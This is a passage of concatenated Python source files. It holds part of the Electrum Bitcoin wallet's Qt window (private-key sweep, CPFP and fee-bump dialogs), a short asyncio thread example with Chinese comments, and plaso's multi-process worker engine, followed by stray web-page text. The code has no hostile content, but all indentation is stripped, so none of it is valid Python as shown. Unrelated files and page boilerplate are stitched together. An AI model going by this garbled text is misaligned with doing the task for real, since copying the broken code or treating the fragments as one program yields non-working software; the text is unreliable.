def export_requests(self):
export_meta_gui(self, _('requests'), self.wallet.export_requests)
def import_contacts(self):
import_meta_gui(self, _('contacts'), self.contacts.import_file, self.contact_list.update)
def export_contacts(self):
export_meta_gui(self, _('contacts'), self.contacts.export_file)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True, config=self.config)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {repr(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address_for_corruption(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
privkeys = get_pk()
def on_success(result):
coins, keypairs = result
outputs = [PartialTxOutput.from_address_and_value(addr, value='!')]
self.warn_if_watching_only()
self.pay_onchain_dialog(coins, outputs, external_keypairs=keypairs)
def on_failure(exc_info):
self.on_error(exc_info)
msg = _('Preparing sweep transaction...')
task = lambda: self.network.run_from_another_thread(
sweep_preparations(privkeys, self.network))
WaitingDialog(self, msg, task, on_success, on_failure)
def _do_import(self, title, header_layout, func):
text = text_dialog(
parent=self,
title=title,
header_layout=header_layout,
ok_label=_('Import'),
allow_multi=True,
config=self.config,
)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
from .settings_dialog import SettingsDialog
d = SettingsDialog(self, self.config)
self.alias_received_signal.connect(d.set_alias_color)
d.exec_()
self.alias_received_signal.disconnect(d.set_alias_color)
if self.fx:
self.fx.trigger_update()
run_hook('close_settings_dialog')
if d.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
util.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.db.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.wallet.db.put("qt-console-history", self.console.history[-50:])
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p: Optional['BasePlugin'], name: str, i: int):
widget = settings_widgets.get(name) # type: Optional[QWidget]
if widget and not p:
# plugin got disabled, rm widget
grid.removeWidget(widget)
widget.setParent(None)
settings_widgets.pop(name)
elif widget is None and p and p.requires_settings() and p.is_enabled():
# plugin got enabled, add widget
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
# note: all enabled plugins will receive this hook:
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp_dialog(self, parent_tx: Transaction) -> None:
new_tx = self.wallet.cpfp(parent_tx, 0)
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_txid = parent_tx.txid()
assert parent_txid
parent_fee = self.wallet.get_tx_fee(parent_txid)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
fee_for_child = fee_e.get_amount()
if fee_for_child is None:
return
out_amt = max_fee - fee_for_child
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_for_child
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb):
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_combo = FeeComboBox(fee_slider)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(fee_combo, 4, 2)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee is None:
return # fee left empty, treat is as "cancel"
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
try:
new_tx = self.wallet.cpfp(parent_tx, fee)
except CannotCPFP as e:
self.show_error(str(e))
return
self.show_transaction(new_tx)
def _add_info_to_tx_from_wallet_and_network(self, tx: PartialTransaction) -> bool:
"""Returns whether successful."""
# note side-effect: tx is being mutated
assert isinstance(tx, PartialTransaction)
try:
# note: this might download input utxos over network
BlockingWaitingDialog(
self,
_("Adding info to tx, from wallet and network..."),
lambda: tx.add_info_from_wallet(self.wallet, ignore_network_issues=False),
)
except NetworkException as e:
self.show_error(repr(e))
return False
return True
def _rbf_dialog(self, tx: Transaction, func, title, help_text):
txid = tx.txid()
assert txid
if not isinstance(tx, PartialTransaction):
tx = PartialTransaction.from_tx(tx)
if not self._add_info_to_tx_from_wallet_and_network(tx):
return
fee = tx.get_fee()
assert fee is not None
tx_label = self.wallet.get_label_for_txid(txid)
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, title)
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(help_text))
ok_button = OkButton(d)
warning_label = WWLabel('\n')
warning_label.setStyleSheet(ColorScheme.RED.as_stylesheet())
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
def on_feerate():
fee_rate = feerate_e.get_amount()
warning_text = '\n'
if fee_rate is not None:
try:
new_tx = func(fee_rate)
except Exception as e:
new_tx = None
warning_text = str(e).replace('\n',' ')
else:
new_tx = None
ok_button.setEnabled(new_tx is not None)
warning_label.setText(warning_text)
feerate_e.textChanged.connect(on_feerate)
def on_slider(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider)
fee_combo = FeeComboBox(fee_slider)
fee_slider.deactivate()
feerate_e.textEdited.connect(fee_slider.deactivate)
grid = QGridLayout()
grid.addWidget(QLabel(_('Current Fee') + ':'), 0, 0)
grid.addWidget(QLabel(self.format_amount(fee) + ' ' + self.base_unit()), 0, 1)
grid.addWidget(QLabel(_('Current Fee rate') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_fee_rate(1000 * old_fee_rate)), 1, 1)
grid.addWidget(QLabel(_('New Fee rate') + ':'), 2, 0)
grid.addWidget(feerate_e, 2, 1)
grid.addWidget(fee_slider, 3, 1)
grid.addWidget(fee_combo, 3, 2)
vbox.addLayout(grid)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addWidget(warning_label)
vbox.addLayout(Buttons(CancelButton(d), ok_button))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee_rate = feerate_e.get_amount()
try:
new_tx = func(new_fee_rate)
except Exception as e:
self.show_error(str(e))
return
new_tx.set_rbf(not is_final)
self.show_transaction(new_tx, tx_desc=tx_label)
def bump_fee_dialog(self, tx: Transaction):
title = _('Bump Fee')
help_text = _("Increase your transaction's fee to improve its position in mempool.")
def func(new_fee_rate):
return self.wallet.bump_fee(
tx=tx,
txid=tx.txid(),
new_fee_rate=new_fee_rate,
coins=self.get_coins())
self._rbf_dialog(tx, func, title, help_text)
def dscancel_dialog(self, tx: Transaction):
title = _('Cancel transaction')
help_text = _(
"Cancel an unconfirmed RBF transaction by double-spending "
"its inputs back to your wallet with a higher fee.")
def func(new_fee_rate):
return self.wallet.dscancel(tx=tx, new_fee_rate=new_fee_rate)
self._rbf_dialog(tx, func, title, help_text)
def save_transaction_into_wallet(self, tx: Transaction):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.save_db()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
def show_cert_mismatch_error(self):
if self.showing_cert_mismatch_error:
return
self.showing_cert_mismatch_error = True
self.show_critical(title=_("Certificate mismatch"),
msg=_("The SSL certificate provided by the main server did not match the fingerprint passed in with the --serverfingerprint option.") + "\n\n" +
_("Electrum will now exit."))
self.showing_cert_mismatch_error = False
self.close()
|
p8.py
|
import asyncio
import threading
from threading import Thread
# 循环存在与循环策略的上下文中,
# DefaultEventLoopPolicy 检查每个线程的循环并且不允许通过asyncio.get_event_loop()在主线程之外创建循环
asyncio.get_event_loop()
def create_event_loop_thread(worker, *args, **kwargs):
def _worker(*args, **kwargs):
# 线程本地事件循环
loop = asyncio.new_event_loop()
print(id(loop))
asyncio.set_event_loop(loop)
try:
loop.run_until_complete(worker(*args, **kwargs))
finally:
loop.close()
return Thread(target=_worker, args=args, kwargs=kwargs)
async def print_coro(*args, **kwargs):
print(f"inside the print coro on {threading.get_ident()}", flush=True)
if __name__ == '__main__':
workers = [create_event_loop_thread(print_coro) for i in range(10)]
for thread in workers:
thread.start()
for thread in workers:
thread.join()
|
engine.py
|
# -*- coding: utf-8 -*-
"""The multi-process processing engine."""
import abc
import ctypes
import os
import signal
import sys
import threading
import time
from plaso.engine import engine
from plaso.engine import process_info
from plaso.lib import definitions
from plaso.multi_process import logger
from plaso.multi_process import plaso_xmlrpc
class MultiProcessEngine(engine.BaseEngine):
"""Multi-process engine base.
This class contains functionality to:
* monitor and manage worker processes;
* retrieve a process status information via RPC;
* manage the status update thread.
"""
# Note that on average Windows seems to require a longer wait.
_RPC_SERVER_TIMEOUT = 8.0
_MAXIMUM_RPC_ERRORS = 10
# Maximum number of attempts to try to start a replacement worker process.
_MAXIMUM_REPLACEMENT_RETRIES = 3
# Number of seconds to wait between attempts to start a replacement worker
# process
_REPLACEMENT_WORKER_RETRY_DELAY = 1
_PROCESS_JOIN_TIMEOUT = 5.0
_ZEROMQ_NO_WORKER_REQUEST_TIME_SECONDS = 300
def __init__(self):
"""Initializes a multi-process engine."""
super(MultiProcessEngine, self).__init__()
self._debug_output = False
self._name = 'Main'
self._log_filename = None
self._pid = os.getpid()
self._process_information = process_info.ProcessInfo(self._pid)
self._process_information_per_pid = {}
self._processes_per_pid = {}
self._quiet_mode = False
self._rpc_clients_per_pid = {}
self._rpc_errors_per_pid = {}
self._status_update_active = False
self._status_update_callback = None
self._status_update_thread = None
self._storage_writer = None
self._worker_memory_limit = definitions.DEFAULT_WORKER_MEMORY_LIMIT
def _AbortJoin(self, timeout=None):
"""Aborts all registered processes by joining with the parent process.
Args:
timeout (int): number of seconds to wait for processes to join, where
None represents no timeout.
"""
for pid, process in self._processes_per_pid.items():
logger.debug('Waiting for process: {0:s} (PID: {1:d}).'.format(
process.name, pid))
process.join(timeout=timeout)
if not process.is_alive():
logger.debug('Process {0:s} (PID: {1:d}) stopped.'.format(
process.name, pid))
def _AbortKill(self):
"""Aborts all registered processes by sending a SIGKILL or equivalent."""
for pid, process in self._processes_per_pid.items():
if not process.is_alive():
continue
logger.warning('Killing process: {0:s} (PID: {1:d}).'.format(
process.name, pid))
self._KillProcess(pid)
def _AbortTerminate(self):
"""Aborts all registered processes by sending a SIGTERM or equivalent."""
for pid, process in self._processes_per_pid.items():
if not process.is_alive():
continue
logger.warning('Terminating process: {0:s} (PID: {1:d}).'.format(
process.name, pid))
process.terminate()
def _CheckStatusWorkerProcess(self, pid):
"""Checks the status of a worker process.
If a worker process is not responding the process is terminated and
a replacement process is started.
Args:
pid (int): process ID (PID) of a registered worker process.
Raises:
KeyError: if the process is not registered with the engine.
"""
# TODO: Refactor this method, simplify and separate concerns (monitoring
# vs management).
self._RaiseIfNotRegistered(pid)
process = self._processes_per_pid[pid]
process_status = self._QueryProcessStatus(process)
if process_status is None:
process_is_alive = False
else:
process_is_alive = True
process_information = self._process_information_per_pid[pid]
used_memory = process_information.GetUsedMemory() or 0
if self._worker_memory_limit and used_memory > self._worker_memory_limit:
logger.warning((
'Process: {0:s} (PID: {1:d}) killed because it exceeded the '
'memory limit: {2:d}.').format(
process.name, pid, self._worker_memory_limit))
self._KillProcess(pid)
if isinstance(process_status, dict):
self._rpc_errors_per_pid[pid] = 0
status_indicator = process_status.get('processing_status', None)
else:
rpc_errors = self._rpc_errors_per_pid.get(pid, 0) + 1
self._rpc_errors_per_pid[pid] = rpc_errors
if rpc_errors > self._MAXIMUM_RPC_ERRORS:
process_is_alive = False
if process_is_alive:
rpc_port = process.rpc_port.value
logger.warning((
'Unable to retrieve process: {0:s} (PID: {1:d}) status via '
'RPC socket: http://localhost:{2:d}').format(
process.name, pid, rpc_port))
processing_status_string = 'RPC error'
status_indicator = definitions.STATUS_INDICATOR_RUNNING
else:
processing_status_string = 'killed'
status_indicator = definitions.STATUS_INDICATOR_KILLED
process_status = {
'processing_status': processing_status_string}
self._UpdateProcessingStatus(pid, process_status, used_memory)
# _UpdateProcessingStatus can also change the status of the worker,
# So refresh the status if applicable.
for worker_status in self._processing_status.workers_status:
if worker_status.pid == pid:
status_indicator = worker_status.status
break
if status_indicator in definitions.ERROR_STATUS_INDICATORS:
logger.error((
'Process {0:s} (PID: {1:d}) is not functioning correctly. '
'Status code: {2!s}.').format(process.name, pid, status_indicator))
self._TerminateProcessByPid(pid)
replacement_process = None
for replacement_process_attempt in range(
self._MAXIMUM_REPLACEMENT_RETRIES):
logger.info((
'Attempt: {0:d} to start replacement worker process for '
'{1:s}').format(replacement_process_attempt + 1, process.name))
replacement_process = self._StartWorkerProcess(process.name)
if replacement_process:
break
time.sleep(self._REPLACEMENT_WORKER_RETRY_DELAY)
if not replacement_process:
logger.error(
'Unable to create replacement worker process for: {0:s}'.format(
process.name))
def _KillProcess(self, pid):
"""Issues a SIGKILL or equivalent to the process.
Args:
pid (int): process identifier (PID).
"""
if sys.platform.startswith('win'):
process_terminate = 1
handle = ctypes.windll.kernel32.OpenProcess(
process_terminate, False, pid)
ctypes.windll.kernel32.TerminateProcess(handle, -1)
ctypes.windll.kernel32.CloseHandle(handle)
else:
try:
os.kill(pid, signal.SIGKILL)
except OSError as exception:
logger.error('Unable to kill process {0:d} with error: {1!s}'.format(
pid, exception))
def _QueryProcessStatus(self, process):
"""Queries a process to determine its status.
Args:
process (MultiProcessBaseProcess): process to query for its status.
Returns:
dict[str, str]: status values received from the worker process.
"""
process_is_alive = process.is_alive()
if process_is_alive:
rpc_client = self._rpc_clients_per_pid.get(process.pid, None)
process_status = rpc_client.CallFunction()
else:
process_status = None
return process_status
def _RaiseIfNotMonitored(self, pid):
"""Raises if the process is not monitored by the engine.
Args:
pid (int): process identifier (PID).
Raises:
KeyError: if the process is not monitored by the engine.
"""
if pid not in self._process_information_per_pid:
raise KeyError(
'Process (PID: {0:d}) not monitored by engine.'.format(pid))
def _RaiseIfNotRegistered(self, pid):
"""Raises if the process is not registered with the engine.
Args:
pid (int): process identifier (PID).
Raises:
KeyError: if the process is not registered with the engine.
"""
if pid not in self._processes_per_pid:
raise KeyError(
'Process (PID: {0:d}) not registered with engine'.format(pid))
def _RegisterProcess(self, process):
"""Registers a process with the engine.
Args:
process (MultiProcessBaseProcess): process.
Raises:
KeyError: if the process is already registered with the engine.
ValueError: if the process is missing.
"""
if process is None:
raise ValueError('Missing process.')
if process.pid in self._processes_per_pid:
raise KeyError(
'Already managing process: {0!s} (PID: {1:d})'.format(
process.name, process.pid))
self._processes_per_pid[process.pid] = process
# pylint: disable=redundant-returns-doc
@abc.abstractmethod
def _StartWorkerProcess(self, process_name):
"""Creates, starts, monitors and registers a worker process.
Args:
process_name (str): process name.
Returns:
MultiProcessWorkerProcess: extraction worker process.
"""
def _StartMonitoringProcess(self, process):
"""Starts monitoring a process.
Args:
process (MultiProcessBaseProcess): process.
Raises:
IOError: if the RPC client cannot connect to the server.
KeyError: if the process is not registered with the engine or
if the process is already being monitored.
OSError: if the RPC client cannot connect to the server.
ValueError: if the process is missing.
"""
if process is None:
raise ValueError('Missing process.')
pid = process.pid
if pid in self._process_information_per_pid:
raise KeyError(
'Already monitoring process (PID: {0:d}).'.format(pid))
if pid in self._rpc_clients_per_pid:
raise KeyError(
'RPC client (PID: {0:d}) already exists'.format(pid))
rpc_client = plaso_xmlrpc.XMLProcessStatusRPCClient()
# Make sure that a worker process has started its RPC server.
# The RPC port will be 0 if no server is available.
rpc_port = process.rpc_port.value
time_waited_for_process = 0.0
while not rpc_port:
time.sleep(0.1)
rpc_port = process.rpc_port.value
time_waited_for_process += 0.1
if time_waited_for_process >= self._RPC_SERVER_TIMEOUT:
raise IOError(
'RPC client unable to determine server (PID: {0:d}) port.'.format(
pid))
hostname = 'localhost'
if not rpc_client.Open(hostname, rpc_port):
raise IOError((
'RPC client unable to connect to server (PID: {0:d}) '
'http://{1:s}:{2:d}').format(pid, hostname, rpc_port))
self._rpc_clients_per_pid[pid] = rpc_client
self._process_information_per_pid[pid] = process_info.ProcessInfo(pid)
def _StartStatusUpdateThread(self):
"""Starts the status update thread."""
self._status_update_active = True
self._status_update_thread = threading.Thread(
name='Status update', target=self._StatusUpdateThreadMain)
self._status_update_thread.start()
@abc.abstractmethod
def _StatusUpdateThreadMain(self):
"""Main function of the status update thread."""
def _StopMonitoringProcess(self, process):
"""Stops monitoring a process.
Args:
process (MultiProcessBaseProcess): process.
Raises:
KeyError: if the process is not monitored.
ValueError: if the process is missing.
"""
if process is None:
raise ValueError('Missing process.')
pid = process.pid
self._RaiseIfNotMonitored(pid)
del self._process_information_per_pid[pid]
rpc_client = self._rpc_clients_per_pid.get(pid, None)
if rpc_client:
rpc_client.Close()
del self._rpc_clients_per_pid[pid]
if pid in self._rpc_errors_per_pid:
del self._rpc_errors_per_pid[pid]
logger.debug('Stopped monitoring process: {0:s} (PID: {1:d})'.format(
process.name, pid))
def _StopMonitoringProcesses(self):
"""Stops monitoring all processes."""
# We need to make a copy of the list of pids since we are changing
# the dict in the loop.
for pid in list(self._process_information_per_pid.keys()):
self._RaiseIfNotRegistered(pid)
process = self._processes_per_pid[pid]
self._StopMonitoringProcess(process)
def _StopStatusUpdateThread(self):
"""Stops the status update thread."""
if self._status_update_thread:
self._status_update_active = False
if self._status_update_thread.is_alive():
self._status_update_thread.join()
self._status_update_thread = None
def _TerminateProcessByPid(self, pid):
"""Terminate a process that's monitored by the engine.
Args:
pid (int): process identifier (PID).
Raises:
KeyError: if the process is not registered with and monitored by the
engine.
"""
self._RaiseIfNotRegistered(pid)
process = self._processes_per_pid[pid]
self._TerminateProcess(process)
self._StopMonitoringProcess(process)
def _TerminateProcess(self, process):
"""Terminate a process.
Args:
process (MultiProcessBaseProcess): process to terminate.
"""
pid = process.pid
logger.warning('Terminating process: (PID: {0:d}).'.format(pid))
process.terminate()
# Wait for the process to exit.
process.join(timeout=self._PROCESS_JOIN_TIMEOUT)
if process.is_alive():
logger.warning('Killing process: (PID: {0:d}).'.format(pid))
self._KillProcess(pid)
@abc.abstractmethod
def _UpdateProcessingStatus(self, pid, process_status, used_memory):
"""Updates the processing status.
Args:
pid (int): process identifier (PID) of the worker process.
process_status (dict[str, object]): status values received from
the worker process.
used_memory (int): size of used memory in bytes.
Raises:
KeyError: if the process is not registered with the engine.
"""
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.